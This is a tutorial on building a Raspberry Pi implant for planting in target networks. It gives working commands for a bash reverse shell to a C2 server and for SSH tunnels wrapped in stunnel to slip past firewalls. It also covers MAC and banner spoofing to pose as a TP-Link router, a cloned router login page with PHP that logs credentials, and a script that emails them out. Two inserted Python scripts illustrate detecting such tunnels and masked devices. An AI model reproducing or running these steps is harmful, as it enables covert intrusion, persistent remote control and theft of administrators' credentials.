I will show you how I made a hacking gadget from a Raspberry Pi which you can infiltrate into a network over an Ethernet cable or a Wi-Fi adapter. The gadget can be powered from a power adapter or a battery, which makes it even more portable. As soon as it is connected to the network, it automatically creates an encrypted tunnel (SSH/TLS, port 443) to the C2 server, so you can control the gadget over a shell from any part of the world. In addition, to avoid easy detection I tried to mask the gadget to look like a router: I changed the MAC address, hid the SSH version and changed the Apache service name into the router's one. It also includes a phishing page that mimics the real router's login page, and the submitted credentials are sent over email. The gadget also includes a Wi-Fi access point, which gives you the option to control it from a phone or PC using the SSH protocol. This is practical in case you want to infiltrate the gadget over Wi-Fi and you do not know the Wi-Fi password until the on-site penetration test begins. This gadget is very suitable for red teamers.
Let’s start by explaining how I did it.
Hardware:
I am using a Raspberry Pi 3 (with Raspbian Bullseye Lite installed), which has a built-in Ethernet adapter (eth0) and Wi-Fi adapter (wlan0), so either of these adapters is used to connect to the target network. Then I added an external USB antenna, which is used for the Wi-Fi access point (wlan1). To enable powering from a battery, I added a TP4056 LiPo battery charger and a DC-DC step-up (boost) converter. Of course, it is also possible to power it from an adapter. I also added a power button, a status LED, and a button to disable the Wi-Fi access point. Everything was then put into an enclosure, which I designed in 3D and made myself.
Terminal stuff:
1. Connect gadget to the C2 server
I will show you three different ways to perform tunneling: over plain TCP, over the SSH protocol, and SSH inside an SSL tunnel. Plain TCP is technically the easiest way, while SSH and SSH/SSL are a little bit harder. But do not be afraid, it is not rocket science.
Approach 1 — create tunnel with TCP protocol
This is the easiest way to create a tunnel between the Raspberry Pi and the C2 server, and consequently to control the Pi from the server.
We need only a one-line command on each side, the Raspberry Pi and the C2 server.
On Raspberry Pi:
sudo bash -i >& /dev/tcp/<C2 Server IP>/5555 0>&1
On C2 server:
nc -vv -l -p 5555
I would use this approach when I know that the target site does not have any system admin and doesn't put much effort into security. You need to know that this TCP traffic is not encrypted, so it would be easily captured and detected.
So in the following text I will show you a little bit more secure approach using the SSH protocol. Once a connection between the Raspberry Pi and the C2 server is established, the data transmitted between them is encrypted.
Approach 2 — create tunnel with SSH protocol
For this purpose we need to set up key-based authentication, which will enable us to establish an SSH connection between the Raspberry Pi and the C2 server.
On the Raspberry Pi, we will use ssh-keygen, which creates a public and a private key:
sudo ssh-keygen -f ~/.ssh/vps -t rsa -N ""
Copy the contents of the public key (in this case vps.pub) into authorized_keys in the /root/.ssh directory on the C2 server and restart the ssh service:
service ssh restart
Test ssh connection:
sudo ssh -i /home/pi/.ssh/vps root@<C2 Server IP>
Now that SSH is set up correctly, we can tunnel connections from the Raspberry Pi to the C2 server by running the following commands:
On Raspberry Pi:
sudo ssh -i /root/.ssh/vps -nNT -R 5555:localhost:22 <C2 Server IP>
On C2 server:
ssh pi@localhost -p 5555
OK. Now that we have gone through two different tunneling approaches (TCP and SSH), I will briefly explain why I included and used the next approach (SSH/SSL).
Let's imagine that we are attacking some big company, which also has an IT department with system admins and some sort of IDS, IPS and firewall that do deep packet inspection, regular scanning, etc. In that kind of company network, port 22 is usually blocked. Also, if you run SSH over e.g. port 443, their systems would identify it and drop the traffic. This is the reason why I chose stunnel, so I can wrap the SSH connection so that it looks like SSL traffic. I established the SSL tunnel over port 443, so it looks like normal SSL traffic and consequently the firewall will permit it.
Approach 3 — create tunnel with SSH/SSL
First of all we need to generate a private and public key on the Raspberry Pi and put the public key on the C2 server, as we did in the previous approach (SSH).
Set up Raspberry Pi:
Install stunnel:
apt-get install stunnel4
Install autossh:
apt-get install autossh
After that, we need to create the stunnel configuration file /etc/stunnel/stunnel.conf and add the following:
pid = /var/run/stunnel.pid
client=yes
[ssh]
accept = 443
connect = <C2 Server IP>:443
We need to ensure that the tunnel starts automatically. Add the following to the /etc/default/stunnel4 file:
ENABLED=1
Then we need to make the Raspberry Pi establish the SSH tunnel automatically when the network interface comes up, by creating the file /etc/network/if-up.d/autossh with the following content:
#!/bin/bash
sudo su -c "autossh -p 443 -f -N -R *:2222:localhost:22 root@localhost -o LogLevel=error -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no" pi
Also start the service and enable it at startup:
sudo systemctl start stunnel4
sudo systemctl enable stunnel4
sudo systemctl daemon-reload
Set up the VPS server:
Install stunnel:
apt-get install stunnel4
Open ports:
ufw enable
ufw allow 22
ufw allow 443
Because we will be tunneling SSH traffic over SSL (HTTPS), we need to generate another key pair, which will be used to encrypt and decrypt the SSL traffic:
openssl genrsa 2048 > /etc/stunnel/stunnel.key
openssl req -new -key /etc/stunnel/stunnel.key -x509 -days 365 -out /etc/stunnel/stunnel.crt
cat /etc/stunnel/stunnel.crt /etc/stunnel/stunnel.key > /etc/stunnel/stunnel.pem
After that, we need to create the stunnel configuration file /etc/stunnel/stunnel.conf and add the following:
pid = /var/run/stunnel.pid
cert = /etc/stunnel/stunnel.pem
[ssh]
accept = 443
connect = 127.0.0.1:22
We need to ensure that the tunnel starts automatically and listens on port 443. Add the following to the /etc/default/stunnel4 file:
ENABLED=1
Also start the service and enable it at startup:
sudo systemctl start stunnel4
sudo systemctl enable stunnel4
sudo systemctl daemon-reload
Finally, reboot the C2 server.
That's it. To get control over the Raspberry Pi, run the following on the C2 server:
ssh -p 2222 pi@localhost
I have explained three different ways to control the Raspberry Pi remotely through the C2 server, and consequently from any part of the world. My recommendation is to stick to the last (SSH/SSL) approach in every case.
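From the defender's side, all three approaches above leave the same trace in network flow logs: one outbound session from an internal address that stays open for hours and carries very little data, whether it is plain TCP on 5555, SSH on 22, or SSH wrapped in TLS on 443. The script below is an added illustration, not code from the original post; it runs a duration-and-byte-rate check over a constructed, NetFlow-like text log (the column layout, thresholds and addresses are assumptions of this example).

```python
# Added illustration (not from the original post): flag long-lived, low-rate
# outbound sessions on the ports the three tunnelling approaches use.
# The flow log layout below is a constructed, NetFlow-like format.
from dataclasses import dataclass
from datetime import datetime

# Constructed sample: start end src dst dport bytes_out bytes_in
SAMPLE_FLOWS = """\
2024-03-01T08:00:00 2024-03-01T08:00:02 10.0.5.23 93.184.216.34 443 1800 45000
2024-03-01T08:00:05 2024-03-01T20:00:05 10.0.5.77 203.0.113.10 443 26000 24000
2024-03-01T08:01:00 2024-03-01T08:01:01 10.0.5.23 93.184.216.34 443 900 12000
2024-03-01T09:00:00 2024-03-01T19:30:00 10.0.5.77 203.0.113.10 5555 1200 800
2024-03-01T09:15:00 2024-03-01T09:45:00 10.0.5.40 198.51.100.7 22 400000 300000
"""

# Ports used by the three approaches in the text: 5555 (plain TCP),
# 22 (SSH), 443 (SSH wrapped by stunnel).
TUNNEL_PORTS = frozenset({22, 443, 5555})


@dataclass(frozen=True)
class Flow:
    start: datetime
    end: datetime
    src: str
    dst: str
    dport: int
    bytes_out: int
    bytes_in: int

    @property
    def duration_s(self) -> float:
        return (self.end - self.start).total_seconds()

    @property
    def bytes_per_s(self) -> float:
        total = self.bytes_out + self.bytes_in
        return total / self.duration_s if self.duration_s > 0 else float(total)


def parse_flows(text: str) -> list[Flow]:
    """Parse the whitespace-separated flow log; blank and '#' lines are skipped."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        start, end, src, dst, dport, out_b, in_b = line.split()
        flows.append(Flow(datetime.fromisoformat(start), datetime.fromisoformat(end),
                          src, dst, int(dport), int(out_b), int(in_b)))
    return flows


def suspicious_tunnels(flows, min_duration_s=3600, max_bytes_per_s=50.0,
                       ports=TUNNEL_PORTS):
    """Long-lived, low-rate sessions on the tunnel ports.

    The port-443 case is the one that matters: the payload is TLS and looks like
    any other HTTPS, so session duration and byte rate are what separate a tunnel
    held open by autossh from ordinary web requests (which last seconds).
    """
    return [f for f in flows
            if f.dport in ports
            and f.duration_s >= min_duration_s
            and f.bytes_per_s <= max_bytes_per_s]


def hosts_to_investigate(flows, **thresholds) -> dict[str, list[Flow]]:
    """Group hits by internal source address so one device is reported once."""
    grouped: dict[str, list[Flow]] = {}
    for f in suspicious_tunnels(flows, **thresholds):
        grouped.setdefault(f.src, []).append(f)
    return grouped


if __name__ == "__main__":
    for src, hits in hosts_to_investigate(parse_flows(SAMPLE_FLOWS)).items():
        for f in hits:
            print(f"{src} -> {f.dst}:{f.dport} open {f.duration_s / 3600:.1f} h, "
                  f"{f.bytes_per_s:.1f} B/s")
```

On the constructed sample, only 10.0.5.77 is reported: its 12-hour session on 443 and its 10.5-hour session on 5555 both fall far below 50 bytes per second, while the short HTTPS requests and the 30-minute interactive SSH session pass. The thresholds are deliberately loose; in a real deployment they would be tuned against a baseline of the network's normal long-lived connections (VPN clients, monitoring agents) so those are allow-listed rather than flagged.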
When you infiltrate a serious network, where they have a good security team and the system admins do their job the right way, it is just a matter of time before they detect your hacking gadget. I mean, when the system admin performs a regular scan of the network and finds a new Raspberry Pi device. Well, I think we can all imagine the expression on his face. So it is very smart to mask the Pi to look like something else: a printer, a router, a Windows PC, etc. This will definitely attract less attention.
In my case I masked the Raspberry Pi to look and act like a router, specifically a TP-Link router. I also created a phishing page for the router's settings page, with the purpose of catching the admin's credentials in case he/she finds the device and tries to log in. And I also set it up so that the harvested credentials are sent to my email.
First I spoofed the MAC addresses of both adapters (eth0 and wlan1) to a common TP-Link address:
sudo apt install macchanger
I created a bash script (mac.sh) and called it from /etc/rc.local, so it changes the MAC addresses on each boot or reboot.
#!/bin/bash
sudo ifconfig eth0 down
sudo macchanger -m f8:d1:11:2a:24:a3 eth0
sudo ifconfig eth0 up
sudo ifconfig wlan1 down
sudo macchanger -m f8:d1:11:2a:24:a4 wlan1
sudo ifconfig wlan1 up
Changing the service names on ports 22 and 80
For port 22 you should hide the Debian version in the SSH banner, so the association between a router and a Debian distro does not look suspicious. To do this, add the following line to /etc/ssh/sshd_config:
DebianBanner no
Next, change the Apache2 service name. Why should we change it? Well, when you scan a router it is not common to see an Apache service running on port 80. So in my case I changed it to TP-LINK WR841N WAP http config.
sudo apt install apache2
sudo apt install -y php
sudo apt install -y php-{common,mysql,xml,xmlrpc,curl,gd,imagick,cli,dev,imap,mbstring,opcache,soap,zip,intl}
sudo systemctl restart apache2
sudo apt install libapache2-mod-security2
sudo a2enmod security2
In the file /etc/apache2/conf-enabled/security.conf add/change the following:
ServerTokens Full
SecServerSignature "TP-LINK WR841N WAP http config"
ServerSignature Off
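The MAC, SSH banner and Apache banner changes above each cover one attribute a scanner sees, and an inventory check that cross-references those attributes is how a network admin catches the mismatch. The script below is an added illustration, not code from the original post: it audits constructed scan records (MAC, DHCP hostname, SSH banner, HTTP headers) against a tiny OUI table and an asset baseline, all of which are assumptions of this example; the f8:d1:11 prefix and the "TP-LINK WR841N WAP http config" string are the ones used in the text.

```python
# Added illustration (not from the original post): cross-check scan results for
# a host whose MAC prefix, SSH banner and HTTP Server header do not agree.
# Device records, the OUI table and the asset baseline are constructed.
from dataclasses import dataclass, field

# Tiny OUI table (first three octets -> vendor). f8:d1:11 is the TP-Link prefix
# used in the text; b8:27:eb is the Raspberry Pi Foundation prefix.
OUI_VENDORS = {"f8:d1:11": "TP-Link", "b8:27:eb": "Raspberry Pi Foundation"}
ROUTER_VENDORS = {"TP-Link"}
# Hostnames a stock Linux install announces in its DHCP request; a router would not.
GENERIC_LINUX_HOSTNAMES = {"raspberrypi", "debian", "ubuntu", "kali", "localhost"}
# Constructed asset baseline: MACs the inventory already knows.
KNOWN_ASSETS = {"f8:d1:11:00:aa:01"}


@dataclass
class Device:
    mac: str
    ip: str
    dhcp_hostname: str = ""
    ssh_banner: str = ""            # first line sshd sends; "" if port 22 is closed
    http_headers: dict = field(default_factory=dict)   # response headers on port 80


def vendor_of(mac: str) -> str:
    return OUI_VENDORS.get(mac.lower()[:8], "unknown")


def audit(dev: Device) -> list[str]:
    """Return the inconsistencies found for one device (empty list = consistent)."""
    findings = []
    vendor = vendor_of(dev.mac)
    if dev.mac.lower() not in KNOWN_ASSETS:
        findings.append(f"{dev.mac} ({vendor}) is not in the asset baseline")
    if vendor in ROUTER_VENDORS:
        # 'DebianBanner no' removes only the Debian suffix; the banner still says
        # OpenSSH, and consumer routers that expose SSH at all usually run Dropbear.
        if "OpenSSH" in dev.ssh_banner:
            findings.append(f"router OUI but SSH banner is {dev.ssh_banner!r}")
        if dev.dhcp_hostname.lower() in GENERIC_LINUX_HOSTNAMES:
            findings.append(f"router OUI but DHCP hostname is {dev.dhcp_hostname!r}")
    server = dev.http_headers.get("Server", "")
    # Renaming the Server header does not remove the X-Powered-By header that a
    # default PHP install adds to its responses.
    if "TP-LINK" in server.upper() and "X-Powered-By" in dev.http_headers:
        findings.append(f"Server header claims {server!r} but X-Powered-By is "
                        f"{dev.http_headers['X-Powered-By']!r}")
    return findings


# Constructed scan results: a genuine router already in the baseline, a masked
# general-purpose Linux host, and an unmodified Raspberry Pi.
SAMPLE_DEVICES = [
    Device("f8:d1:11:00:aa:01", "10.0.5.1", "TL-WR841N",
           http_headers={"Server": "TP-LINK WR841N WAP http config"}),
    Device("f8:d1:11:2a:24:a3", "10.0.5.77", "raspberrypi",
           ssh_banner="SSH-2.0-OpenSSH_8.4p1",
           http_headers={"Server": "TP-LINK WR841N WAP http config",
                         "X-Powered-By": "PHP/7.4.33"}),
    Device("b8:27:eb:12:34:56", "10.0.5.90", "raspberrypi",
           ssh_banner="SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u1"),
]


def audit_all(devices) -> dict[str, list[str]]:
    """Map each device's IP to its list of findings."""
    return {d.ip: audit(d) for d in devices}


if __name__ == "__main__":
    for ip, findings in audit_all(SAMPLE_DEVICES).items():
        print(ip, "OK" if not findings else "")
        for line in findings:
            print("   -", line)
```

The genuine router produces no findings, the unmodified Pi is reported only as a new device, and the masked host is reported four times: it is absent from the baseline, its OUI says router while its SSH banner says OpenSSH and its DHCP hostname says raspberrypi, and its router-branded Server header arrives next to a PHP X-Powered-By header. Each rule is cheap on its own; the value is in running them together against every device a scheduled scan returns.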
Creating the phishing page: the router settings page
With the WebScrapBook browser plugin, capture the page source and put it in /var/www/html.
After that, modify the index.html file by adding/changing the action attribute of the form (action="action.php").
Create the action.php file and save it in /var/www/html.
<?php
// Send the browser to /error once the form has been submitted.
$location = '/error';
header("Location: " . "http://" . $_SERVER['HTTP_HOST'] . $location);
// Append every submitted form field to pass.txt.
$handle = fopen("pass.txt", "a");
foreach ($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n\n\n\n");
fclose($handle);
exit;
?>
So in this code you can see that after login it redirects you to the /error folder. In this folder you can create a new index.html file which renders e.g. "you have no authorization to access this router". All harvested credentials are saved in the pass.txt file.
You can find the whole TP-Link router phishing page on my GitHub page.
Setting up email to receive harvested credentials
To receive the harvested credentials by email, you can use msmtp (an SMTP client).
Now you need to create a script and make it run on startup, which checks every 20 seconds whether the pass.txt file exists; if it does, it greps the username and password from it and sends them to your email.
#!/bin/bash
# Every 20 seconds: if pass.txt exists, mail the user/pass lines and delete the file.
while sleep 20
do
    if [ -f /var/www/html/pass.txt ]
    then
        grep -e user -e pass /var/www/html/pass.txt | msmtp --debug --from=default -t example@email.com
        rm -f /var/www/html/pass.txt
    fi
done
Create Wi-Fi access point
sudo git clone https://github.com/oblique/create_ap
cd create_ap
sudo make install
To create the Wi-Fi access point, run the following command:
sudo create_ap -n wlan1 MyAccessPoint MyPassPhrase --no-virt
To create the AP each time at startup, I created the service /etc/systemd/system/ap.service:
[Unit]
Description=Run script with systemd
[Service]
ExecStart=sudo create_ap -n wlan1 MyAccessPoint MyPassPhrase --no-virt
Restart=always
TimeoutStartSec=20
RestartSec=20
[Install]
WantedBy=multi-user.target
To enable the service, run:
sudo systemctl enable ap.service
sudo systemctl daemon-reload